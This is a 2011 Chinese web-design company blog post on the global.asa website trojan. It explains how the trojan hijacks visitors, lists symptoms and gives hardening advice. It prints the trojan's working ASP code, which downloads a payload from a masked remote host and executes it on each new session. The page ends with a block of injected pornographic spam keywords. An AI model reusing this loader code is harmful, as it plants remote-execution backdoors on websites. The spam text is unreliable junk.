十年專注于品牌網站建設 十余年專注于網站建設_小程序開發_APP開發,低調、敢創新、有情懷!
      南昌百恒網絡微信公眾號 掃一掃關注
      小程序
      tel-icon全國服務熱線:400-680-9298,0791-88117053
      掃一掃關注百恒網絡微信公眾號
      掃一掃打開百恒網絡微信小程序

      百恒網絡

      南昌百恒網絡

      global.asa木馬病毒

      百恒網絡 2011-11-19 7919

      什么是global.asa木馬呢?

      global.asa在百度百科里是這樣介紹的:

      Global.asa 文件是一個可選的文件,它可包含可被ASP 應用程序中每個頁面訪問的對象、變量以及方法的聲明。所有合法的瀏覽器腳本都能在Global.asa 中使用。 Global.asa 中,我們可以告知application 和session 對象在啟動和結束時做什么事情。完成此項任務的代碼被放置在事件操作器中。

      根據上面的介紹大家應該大體了解了,其實這個木馬就是屬于網站程序木馬,也稱:腳本木馬. 但是黑客為什么會以global.asa命名呢?因為這個文件可以調用很多程序,比如當客戶訪問你的網站的時候,可以調用跳轉的命令。正因為global.asa文件作用的特殊性,所以被黑客所利用,并制作成了網站木馬。

      首先我們來看下global.asa木馬的代碼:

      sub Session_OnStart

      On Error Resume Next

      url="http://www.********.info:1680/global/xmlfilecode.gif"

      Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

      ObjXMLHTTP.Open "GET",url,False

      ObjXMLHTTP.setRequestHeader "User-Agent",url

      ObjXMLHTTP.send

      GetHtml=ObjXMLHTTP.responseBody

      Set ObjXMLHTTP=Nothing

      set objStream = Server.CreateObject("Adodb.Stream")

      objStream.Type = 1

      objStream.Mode =3

      objStream.Open

      objStream.Write GetHtml

      objStream.Position = 0

      objStream.Type = 2

      objStream.Charset = "gb2312"

      GetHtml = objStream.ReadText

      objStream.Close

      set objStream=Nothing

      if instr(GetHtml,"by*aming")>0 then

      execute GetHtml

      end if

      end sub

      sub Session_OnEnd

      end sub

      < /script >

      我來給大家先解釋一下這個代碼的作用:因為global.asa 文件是網站啟動的文件,當一個網站被用戶訪問的時候,會執行Application_Start代碼段的內容,當一個用戶第一次訪問時會執行Session_Start代碼段的內容,所以此段代碼的作用就是當訪問的時候自動下載獲取木馬內容,上面遇到的就是跳轉性作用的木馬代碼。

      global.asa掛馬的癥狀

      global.asa文件是隱藏性,你在FTP軟件都看不到,通過地址欄輸入FTP資料,進入網站空間直接可以看到隱藏global.asa的木馬,當用戶從百度點擊進來的時候(直接輸入網站地址卻正常),網站的會自動跳轉到其他網站:比如色情站點和有病毒的網站。再就是百度site:自己的網站會發現收錄了許多色情頁面如下圖所示:

      也有些其他的癥狀,例如:網站后臺無法登陸,有的是提示 XX錯誤 然后刷新即可訪問。這都是global.asa 劫持用戶的訪問指向。

      global.asa 母級文件Global.asax功能更可怕,我們先看下代碼

      <%@ Language="VB"%><%@ Import Namespace="System.IO"%>

      其中 if fso.FileExists("\."&Server.MapPath("/Global.asa")) then 判斷 根目錄下 Global.asa 文件是否存在,如果存就將文件屬性改為可讀可寫 代碼:f.Attributes=0 然后進行寫入危險代碼(objwriter.write(CODE2)) 再次將文件設為只讀,隱藏、系統屬性f.Attributes=1+2+4,你想刪除都沒那么容易。即使你刪除了創建一個文件夾改名為Global.asa也是毫無意義的。它很快把文件屬改掉,覆蓋掉。

      global.asa木馬詳細解決方法:

      1.要嚴格控制頁面上傳的代碼,上傳權限(包括文本編輯器FCKeditor等)重點防御之處.

      2.后臺登陸要加上驗證碼,

      3.防Sql注入是必須的.

      4.密碼要經過MD5加密.

      5.數據庫擴展名改成普通網頁名稱并加密.

      6.每個頁面都要進行管理員登陸判斷.

      南昌網絡公司百恒網絡提醒廣大站長或網絡公司技術人員:別忘了要把所有可疑文件全部清除,有的病毒設置系統屬性,需要服務器供應該商配下,或通過他們完善的后臺進行清理.

      詳細解決方案請點擊:南昌網站建設建議加強網站安全措施

      專業,專注于南昌網站建設、軟件開發,為用戶提供高品質的網絡產品和優質的服務是我們始終追求的目標!

      希望本文對廣大站長和網站建設公司技術人員有所幫助,如有不理解之處可以與南昌網站制作公司百恒網絡技術部聯系。


      400-680-9298,0791-88117053
      掃一掃關注百恒網絡微信公眾號
      掃一掃打開百恒網絡小程序

      歡迎您的光顧,我們將竭誠為您服務×

      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售后服務 售后服務
       
      售后服務 售后服務
       
      備案專線 備案專線
       
      ×
      中文字幕精品无码久久久久久3D日动漫| 亚洲日韩av无码中文| 78成人精品电影在线播放日韩精品电影一区亚洲 | 精品无码专区亚洲| 亚洲国产精品日韩在线| 亚洲国产精品无码久久久蜜芽| 国语自产精品视频| 精品国产免费人成网站| 亚洲国产综合精品中文字幕| 日韩精品视频美在线精品视频| 日韩一二三区毛片| 国产乱人伦偷精品视频下| 国产精品久久毛片| 国产成人无码精品久久二区三区| 国产精品电影一区二区三区| 精品久久久久久中文字幕一区| 国产精品成熟老妇女| 国产精品无码免费播放| 国产69精品麻豆久久久久| 69精品人人人人人人人人人| 无码精品A∨在线观看无广告 | 538国产精品一区二区在线| 精品一区二区三区视频| 日韩a在线观看免费观看| 日韩毛片免费在线观看| 精品视频一区在线观看| 日本精品一区二区三区四区| 拍国产乱人伦偷精品视频| 亚洲国产精品无码久久久久久曰| 亚洲а∨天堂久久精品| 国产精品白丝AV嫩草影院| 精品久人妻去按摩店被黑人按中出| 国产乱人伦偷精品视频| 精品久久综合1区2区3区激情| 99re这里只有精品国产精品| 国产成人精品日本亚洲专区61| 亚洲韩国精品无码一区二区三区 | 国产在线拍揄自揄视精品| 91精品国产91久久久久久最新| 精品人妻伦一二三区久久| 亚洲精品高清一二区久久|